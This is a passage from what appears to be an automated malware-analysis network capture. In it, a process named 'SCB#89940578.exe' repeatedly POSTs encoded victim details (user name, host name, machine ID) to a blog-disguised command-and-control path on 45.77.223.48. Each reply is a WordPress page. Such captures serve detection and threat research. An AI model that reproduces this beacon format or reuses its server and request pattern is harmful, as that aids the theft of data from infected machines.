Apr 26, 2024 04:43:32.756505966 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:32.756653070 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:32.756787062 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:32.756827116 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:32.756917000 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49802	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:34.068335056 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:34.376399994 CEST	395	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:35.261538982 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:34 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:35.261635065 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:35.262007952 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:35.269120932 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:35.269467115 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:35.269510031 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:35.269736052 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:35.271595955 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:35.271699905 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:35.271783113 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:35.450830936 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49803	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:35.596260071 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:35.785276890 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:37.022051096 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:35 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:37.022212029 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:37.022315979 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:37.063513041 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:37.074321985 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:37.074476004 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:37.074548006 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:37.074830055 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:37.074889898 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:37.075083971 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49804	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:38.519329071 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:38.709527969 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:39.619461060 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:38 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:39.619553089 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:39.619653940 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:39.630503893 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:39.630889893 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:39.631001949 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:39.631165981 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:39.631247997 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:39.631432056 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:39.631551027 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49805	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:40.002815962 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:40.191472054 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:41.096502066 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:40 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:41.096561909 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:41.096579075 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:41.106626987 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:41.107115984 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:41.107374907 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:41.107525110 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:41.107817888 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:41.107883930 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:41.107952118 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

